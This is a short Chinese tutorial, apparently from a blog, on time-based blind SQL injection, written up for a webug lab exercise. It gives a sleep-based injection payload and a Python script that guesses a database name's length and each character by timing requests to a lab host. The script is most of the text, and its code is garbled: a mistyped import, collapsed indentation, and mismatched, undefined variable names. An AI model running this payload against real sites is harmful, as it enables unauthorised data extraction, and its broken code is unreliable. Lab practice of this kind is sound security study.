当测试注入漏洞时,页面没有返还结果,连报错都没有时,可以考虑延时。
比如这条语句 ?type=1 and if(length(database())=%d,sleep(5),1)
如果这条语句被服务器正确执行,那么服务器返回数据强要比平时慢5秒,通过比较时间来判断正确还是错误。
这就给我们编程提供了思路,如果要猜测一个字段可以先猜测其长度,在一个猜每一个字符
这次依旧是webug的一道练习题
mport requests import time payloads = 'qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM0123456789@_.}{,' print( 'start get length...')
def long(): for l in range(1,21): startTime1=time.time() url1 = "http://192.168.148.129/pentest/test/time/?type=1 and if(length(database())=%d,sleep(5),1)"%(l) response1 = requests.get(url1) if time.time() - startTime1 > 5: length=l print ("the length is " + str(length)) break
return length def inject(): print( 'start database sql injection...') for d in range(1,length+1): for payload in payloads: startTime2=time.time() url2 = "http://192.168.148.129/pentest/test/time/?type=1 and if(substr(database(),'%d',1)='%s',sleep(5),1)"%(d,payload) response2 = requests.get(url2) # if time.time() - startTime2 > 5: database+=payload print(database) break
return database
if __name__ == '__main__':
length=long()
dabase=inject()
print("the database is " + database)
思路就是先猜字段长度,在与payload里的每个字符进行比较得到最终结果。